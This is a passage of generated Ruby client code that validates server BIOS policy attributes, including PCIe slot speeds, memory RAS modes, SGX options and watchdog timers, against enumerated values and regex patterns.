\"HWPM OOB Mode\", \"NATIVE MODE\", \"Native Mode with no Legacy\", \"OOB MODE\"])\n return false unless hwpm_enable_validator.valid?(@hwpm_enable)\n imc_interleave_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1-way Interleave\", \"2-way Interleave\", \"Auto\"])\n return false unless imc_interleave_validator.valid?(@imc_interleave)\n intel_dynamic_speed_select_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_dynamic_speed_select_validator.valid?(@intel_dynamic_speed_select)\n intel_hyper_threading_tech_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_hyper_threading_tech_validator.valid?(@intel_hyper_threading_tech)\n intel_speed_select_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Base\", \"Config 1\", \"Config 2\", \"Config 3\", \"Config 4\"])\n return false unless intel_speed_select_validator.valid?(@intel_speed_select)\n intel_turbo_boost_tech_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_turbo_boost_tech_validator.valid?(@intel_turbo_boost_tech)\n intel_virtualization_technology_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_virtualization_technology_validator.valid?(@intel_virtualization_technology)\n intel_vt_for_directed_io_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_vt_for_directed_io_validator.valid?(@intel_vt_for_directed_io)\n intel_vtd_coherency_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_vtd_coherency_support_validator.valid?(@intel_vtd_coherency_support)\n intel_vtd_interrupt_remapping_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_vtd_interrupt_remapping_validator.valid?(@intel_vtd_interrupt_remapping)\n intel_vtd_pass_through_dma_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_vtd_pass_through_dma_support_validator.valid?(@intel_vtd_pass_through_dma_support)\n intel_vtdats_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless intel_vtdats_support_validator.valid?(@intel_vtdats_support)\n ioh_error_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"No\", \"Yes\"])\n return false unless ioh_error_enable_validator.valid?(@ioh_error_enable)\n ioh_resource_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"IOH0 24k IOH1 40k\", \"IOH0 32k IOH1 32k\", \"IOH0 40k IOH1 24k\", \"IOH0 48k IOH1 16k\", \"IOH0 56k IOH1 8k\"])\n return false unless ioh_resource_validator.valid?(@ioh_resource)\n ip_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless ip_prefetch_validator.valid?(@ip_prefetch)\n ipv4http_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless ipv4http_validator.valid?(@ipv4http)\n ipv4pxe_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless ipv4pxe_validator.valid?(@ipv4pxe)\n ipv6http_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless ipv6http_validator.valid?(@ipv6http)\n ipv6pxe_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless ipv6pxe_validator.valid?(@ipv6pxe)\n kti_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless kti_prefetch_validator.valid?(@kti_prefetch)\n legacy_os_redirection_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless legacy_os_redirection_validator.valid?(@legacy_os_redirection)\n legacy_usb_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"auto\", \"disabled\", \"enabled\"])\n return false unless legacy_usb_support_validator.valid?(@legacy_usb_support)\n llc_alloc_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless llc_alloc_validator.valid?(@llc_alloc)\n llc_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless llc_prefetch_validator.valid?(@llc_prefetch)\n lom_port0state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless lom_port0state_validator.valid?(@lom_port0state)\n lom_port1state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless lom_port1state_validator.valid?(@lom_port1state)\n lom_port2state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless lom_port2state_validator.valid?(@lom_port2state)\n lom_port3state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless lom_port3state_validator.valid?(@lom_port3state)\n lom_ports_all_state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless lom_ports_all_state_validator.valid?(@lom_ports_all_state)\n lv_ddr_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"auto\", \"performance-mode\", \"power-saving-mode\"])\n return false unless lv_ddr_mode_validator.valid?(@lv_ddr_mode)\n make_device_non_bootable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless make_device_non_bootable_validator.valid?(@make_device_non_bootable)\n memory_bandwidth_boost_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless memory_bandwidth_boost_validator.valid?(@memory_bandwidth_boost)\n memory_inter_leave_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1 Way Node Interleave\", \"2 Way Node Interleave\", \"4 Way Node Interleave\", \"8 Way Node Interleave\", \"disabled\", \"enabled\"])\n return false unless memory_inter_leave_validator.valid?(@memory_inter_leave)\n memory_mapped_io_above4gb_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless memory_mapped_io_above4gb_validator.valid?(@memory_mapped_io_above4gb)\n memory_refresh_rate_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1x Refresh\", \"2x Refresh\"])\n return false unless memory_refresh_rate_validator.valid?(@memory_refresh_rate)\n return false if !@memory_size_limit.nil? && @memory_size_limit !~ Regexp.new(/^(\\d|[1-9]\\d|[1-9]\\d{2}|[1-9]\\d{3}|[1-5]\\d{4}|6[0-4]\\d{3}|65[0-4]\\d{2}|655[0-2]\\d|6553[0-5])$|^(platform-default)$/)\n memory_thermal_throttling_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"CLTT with PECI\", \"Disabled\"])\n return false unless memory_thermal_throttling_validator.valid?(@memory_thermal_throttling)\n mirroring_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"inter-socket\", \"intra-socket\"])\n return false unless mirroring_mode_validator.valid?(@mirroring_mode)\n mmcfg_base_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1 GB\", \"2 GB\", \"2.5 GB\", \"3 GB\", \"Auto\"])\n return false unless mmcfg_base_validator.valid?(@mmcfg_base)\n network_stack_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless network_stack_validator.valid?(@network_stack)\n numa_optimized_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless numa_optimized_validator.valid?(@numa_optimized)\n nvmdimm_perform_config_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"BW Optimized\", \"Balanced Profile\", \"Latency Optimized\"])\n return false unless nvmdimm_perform_config_validator.valid?(@nvmdimm_perform_config)\n onboard10gbit_lom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless onboard10gbit_lom_validator.valid?(@onboard10gbit_lom)\n onboard_gbit_lom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless onboard_gbit_lom_validator.valid?(@onboard_gbit_lom)\n onboard_scu_storage_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless onboard_scu_storage_support_validator.valid?(@onboard_scu_storage_support)\n onboard_scu_storage_sw_stack_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Intel RSTe\", \"LSI SW RAID\"])\n return false unless onboard_scu_storage_sw_stack_validator.valid?(@onboard_scu_storage_sw_stack)\n operation_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Test Only\", \"Test and Repair\"])\n return false unless operation_mode_validator.valid?(@operation_mode)\n os_boot_watchdog_timer_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless os_boot_watchdog_timer_validator.valid?(@os_boot_watchdog_timer)\n os_boot_watchdog_timer_policy_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"do-nothing\", \"power-off\", \"reset\"])\n return false unless os_boot_watchdog_timer_policy_validator.valid?(@os_boot_watchdog_timer_policy)\n os_boot_watchdog_timer_timeout_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"5-minutes\", \"10-minutes\", \"15-minutes\", \"20-minutes\"])\n return false unless os_boot_watchdog_timer_timeout_validator.valid?(@os_boot_watchdog_timer_timeout)\n out_of_band_mgmt_port_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless out_of_band_mgmt_port_validator.valid?(@out_of_band_mgmt_port)\n package_cstate_limit_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"C0 C1 State\", \"C0/C1\", \"C2\", \"C6 Non Retention\", \"C6 Retention\", \"No Limit\"])\n return false unless package_cstate_limit_validator.valid?(@package_cstate_limit)\n panic_high_watermark_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"High\", \"Low\"])\n return false unless panic_high_watermark_validator.valid?(@panic_high_watermark)\n partial_cache_line_sparing_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless partial_cache_line_sparing_validator.valid?(@partial_cache_line_sparing)\n partial_mirror_mode_config_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"Percentage\", \"Value in GB\"])\n return false unless partial_mirror_mode_config_validator.valid?(@partial_mirror_mode_config)\n return false if !@partial_mirror_percent.nil? && @partial_mirror_percent !~ Regexp.new(/^(\\d\\.\\d{1,2}|[1-4]\\d\\.\\d{1,2}|50\\.[0]{1,2})$|^(platform-default)$/)\n return false if !@partial_mirror_value1.nil? && @partial_mirror_value1 !~ Regexp.new(/^(\\d|[1-9]\\d|[1-9]\\d{2}|[1-9]\\d{3}|[1-5]\\d{4}|6[0-4]\\d{3}|65[0-4]\\d{2}|655[0-2]\\d|6553[0-5])$|^(platform-default)$/)\n return false if !@partial_mirror_value2.nil? && @partial_mirror_value2 !~ Regexp.new(/^(\\d|[1-9]\\d|[1-9]\\d{2}|[1-9]\\d{3}|[1-5]\\d{4}|6[0-4]\\d{3}|65[0-4]\\d{2}|655[0-2]\\d|6553[0-5])$|^(platform-default)$/)\n return false if !@partial_mirror_value3.nil? && @partial_mirror_value3 !~ Regexp.new(/^(\\d|[1-9]\\d|[1-9]\\d{2}|[1-9]\\d{3}|[1-5]\\d{4}|6[0-4]\\d{3}|65[0-4]\\d{2}|655[0-2]\\d|6553[0-5])$|^(platform-default)$/)\n return false if !@partial_mirror_value4.nil? && @partial_mirror_value4 !~ Regexp.new(/^(\\d|[1-9]\\d|[1-9]\\d{2}|[1-9]\\d{3}|[1-5]\\d{4}|6[0-4]\\d{3}|65[0-4]\\d{2}|655[0-2]\\d|6553[0-5])$|^(platform-default)$/)\n patrol_scrub_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"Enable at End of POST\", \"enabled\"])\n return false unless patrol_scrub_validator.valid?(@patrol_scrub)\n return false if !@patrol_scrub_duration.nil? && @patrol_scrub_duration !~ Regexp.new(/^([5-9]|1\\d|2[0-3])$|^(platform-default)$/)\n pc_ie_ras_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pc_ie_ras_support_validator.valid?(@pc_ie_ras_support)\n pc_ie_ssd_hot_plug_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pc_ie_ssd_hot_plug_support_validator.valid?(@pc_ie_ssd_hot_plug_support)\n pch_usb30mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pch_usb30mode_validator.valid?(@pch_usb30mode)\n pci_option_ro_ms_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless pci_option_ro_ms_validator.valid?(@pci_option_ro_ms)\n pci_rom_clp_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pci_rom_clp_validator.valid?(@pci_rom_clp)\n pcie_ari_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless pcie_ari_support_validator.valid?(@pcie_ari_support)\n pcie_pll_ssc_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"ZeroPointFive\"])\n return false unless pcie_pll_ssc_validator.valid?(@pcie_pll_ssc)\n pcie_slot_mraid1link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless pcie_slot_mraid1link_speed_validator.valid?(@pcie_slot_mraid1link_speed)\n pcie_slot_mraid1option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_mraid1option_rom_validator.valid?(@pcie_slot_mraid1option_rom)\n pcie_slot_mraid2link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless pcie_slot_mraid2link_speed_validator.valid?(@pcie_slot_mraid2link_speed)\n pcie_slot_mraid2option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_mraid2option_rom_validator.valid?(@pcie_slot_mraid2option_rom)\n pcie_slot_mstorraid_link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless pcie_slot_mstorraid_link_speed_validator.valid?(@pcie_slot_mstorraid_link_speed)\n pcie_slot_mstorraid_option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_mstorraid_option_rom_validator.valid?(@pcie_slot_mstorraid_option_rom)\n pcie_slot_nvme1link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless pcie_slot_nvme1link_speed_validator.valid?(@pcie_slot_nvme1link_speed)\n pcie_slot_nvme1option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_nvme1option_rom_validator.valid?(@pcie_slot_nvme1option_rom)\n pcie_slot_nvme2link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless pcie_slot_nvme2link_speed_validator.valid?(@pcie_slot_nvme2link_speed)\n pcie_slot_nvme2option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_nvme2option_rom_validator.valid?(@pcie_slot_nvme2option_rom)\n pcie_slot_nvme3link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless pcie_slot_nvme3link_speed_validator.valid?(@pcie_slot_nvme3link_speed)\n pcie_slot_nvme3option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_nvme3option_rom_validator.valid?(@pcie_slot_nvme3option_rom)\n pcie_slot_nvme4link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless pcie_slot_nvme4link_speed_validator.valid?(@pcie_slot_nvme4link_speed)\n pcie_slot_nvme4option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_nvme4option_rom_validator.valid?(@pcie_slot_nvme4option_rom)\n pcie_slot_nvme5link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless pcie_slot_nvme5link_speed_validator.valid?(@pcie_slot_nvme5link_speed)\n pcie_slot_nvme5option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_nvme5option_rom_validator.valid?(@pcie_slot_nvme5option_rom)\n pcie_slot_nvme6link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless pcie_slot_nvme6link_speed_validator.valid?(@pcie_slot_nvme6link_speed)\n pcie_slot_nvme6option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slot_nvme6option_rom_validator.valid?(@pcie_slot_nvme6option_rom)\n pcie_slots_cdn_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pcie_slots_cdn_enable_validator.valid?(@pcie_slots_cdn_enable)\n pop_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless pop_support_validator.valid?(@pop_support)\n post_error_pause_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless post_error_pause_validator.valid?(@post_error_pause)\n post_package_repair_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Disabled\", \"Hard PPR\"])\n return false unless post_package_repair_validator.valid?(@post_package_repair)\n processor_c1e_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless processor_c1e_validator.valid?(@processor_c1e)\n processor_c3report_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless processor_c3report_validator.valid?(@processor_c3report)\n processor_c6report_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless processor_c6report_validator.valid?(@processor_c6report)\n processor_cstate_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless processor_cstate_validator.valid?(@processor_cstate)\n psata_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"AHCI\", \"Disabled\", \"LSI SW RAID\"])\n return false unless psata_validator.valid?(@psata)\n pstate_coord_type_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"HW ALL\", \"SW ALL\", \"SW ANY\"])\n return false unless pstate_coord_type_validator.valid?(@pstate_coord_type)\n putty_key_pad_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"ESCN\", \"LINUX\", \"SCO\", \"VT100\", \"VT400\", \"XTERMR6\"])\n return false unless putty_key_pad_validator.valid?(@putty_key_pad)\n pwr_perf_tuning_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"bios\", \"os\", \"peci\"])\n return false unless pwr_perf_tuning_validator.valid?(@pwr_perf_tuning)\n qpi_link_frequency_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"6.4-gt/s\", \"7.2-gt/s\", \"8.0-gt/s\", \"9.6-gt/s\", \"auto\"])\n return false unless qpi_link_frequency_validator.valid?(@qpi_link_frequency)\n qpi_link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"10.4GT/s\", \"11.2GT/s\", \"9.6GT/s\", \"Auto\"])\n return false unless qpi_link_speed_validator.valid?(@qpi_link_speed)\n qpi_snoop_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"auto\", \"cluster-on-die\", \"early-snoop\", \"home-directory-snoop\", \"home-directory-snoop-with-osb\", \"home-snoop\"])\n return false unless qpi_snoop_mode_validator.valid?(@qpi_snoop_mode)\n rank_inter_leave_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1-way\", \"2-way\", \"4-way\", \"8-way\", \"auto\"])\n return false unless rank_inter_leave_validator.valid?(@rank_inter_leave)\n redirection_after_post_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Always Enable\", \"Bootloader\"])\n return false unless redirection_after_post_validator.valid?(@redirection_after_post)\n sata_mode_select_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"AHCI\", \"Disabled\", \"LSI SW RAID\"])\n return false unless sata_mode_select_validator.valid?(@sata_mode_select)\n select_memory_ras_configuration_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"adddc-sparing\", \"lockstep\", \"maximum-performance\", \"mirror-mode-1lm\", \"mirroring\", \"partial-mirror-mode-1lm\", \"sparing\"])\n return false unless select_memory_ras_configuration_validator.valid?(@select_memory_ras_configuration)\n select_ppr_type_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"Hard PPR\", \"Soft PPR\"])\n return false unless select_ppr_type_validator.valid?(@select_ppr_type)\n serial_port_aenable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless serial_port_aenable_validator.valid?(@serial_port_aenable)\n sev_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"253 ASIDs\", \"509 ASIDs\", \"Auto\"])\n return false unless sev_validator.valid?(@sev)\n sgx_auto_registration_agent_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sgx_auto_registration_agent_validator.valid?(@sgx_auto_registration_agent)\n return false if !@sgx_epoch0.nil? && @sgx_epoch0 !~ Regexp.new(/^([0-9a-fA-F]{1,16})$|^(platform-default)$/)\n return false if !@sgx_epoch1.nil? && @sgx_epoch1 !~ Regexp.new(/^([0-9a-fA-F]{1,16})$|^(platform-default)$/)\n sgx_factory_reset_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sgx_factory_reset_validator.valid?(@sgx_factory_reset)\n return false if !@sgx_le_pub_key_hash0.nil? && @sgx_le_pub_key_hash0 !~ Regexp.new(/^([0-9a-fA-F]{1,16})$|^(platform-default)$/)\n return false if !@sgx_le_pub_key_hash1.nil? && @sgx_le_pub_key_hash1 !~ Regexp.new(/^([0-9a-fA-F]{1,16})$|^(platform-default)$/)\n return false if !@sgx_le_pub_key_hash2.nil? && @sgx_le_pub_key_hash2 !~ Regexp.new(/^([0-9a-fA-F]{1,16})$|^(platform-default)$/)\n return false if !@sgx_le_pub_key_hash3.nil? && @sgx_le_pub_key_hash3 !~ Regexp.new(/^([0-9a-fA-F]{1,16})$|^(platform-default)$/)\n sgx_le_wr_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sgx_le_wr_validator.valid?(@sgx_le_wr)\n sgx_package_info_in_band_access_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sgx_package_info_in_band_access_validator.valid?(@sgx_package_info_in_band_access)\n sgx_qos_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sgx_qos_validator.valid?(@sgx_qos)\n sha1pcr_bank_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sha1pcr_bank_validator.valid?(@sha1pcr_bank)\n sha256pcr_bank_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sha256pcr_bank_validator.valid?(@sha256pcr_bank)\n single_pctl_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"No\", \"Yes\"])\n return false unless single_pctl_enable_validator.valid?(@single_pctl_enable)\n slot10link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot10link_speed_validator.valid?(@slot10link_speed)\n slot10state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot10state_validator.valid?(@slot10state)\n slot11link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot11link_speed_validator.valid?(@slot11link_speed)\n slot11state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot11state_validator.valid?(@slot11state)\n slot12link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot12link_speed_validator.valid?(@slot12link_speed)\n slot12state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot12state_validator.valid?(@slot12state)\n slot13state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot13state_validator.valid?(@slot13state)\n slot14state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot14state_validator.valid?(@slot14state)\n slot1link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot1link_speed_validator.valid?(@slot1link_speed)\n slot1state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot1state_validator.valid?(@slot1state)\n slot2link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot2link_speed_validator.valid?(@slot2link_speed)\n slot2state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot2state_validator.valid?(@slot2state)\n slot3link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot3link_speed_validator.valid?(@slot3link_speed)\n slot3state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot3state_validator.valid?(@slot3state)\n slot4link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot4link_speed_validator.valid?(@slot4link_speed)\n slot4state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot4state_validator.valid?(@slot4state)\n slot5link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot5link_speed_validator.valid?(@slot5link_speed)\n slot5state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot5state_validator.valid?(@slot5state)\n slot6link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot6link_speed_validator.valid?(@slot6link_speed)\n slot6state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot6state_validator.valid?(@slot6state)\n slot7link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot7link_speed_validator.valid?(@slot7link_speed)\n slot7state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot7state_validator.valid?(@slot7state)\n slot8link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot8link_speed_validator.valid?(@slot8link_speed)\n slot8state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot8state_validator.valid?(@slot8state)\n slot9link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot9link_speed_validator.valid?(@slot9link_speed)\n slot9state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot9state_validator.valid?(@slot9state)\n slot_flom_link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", 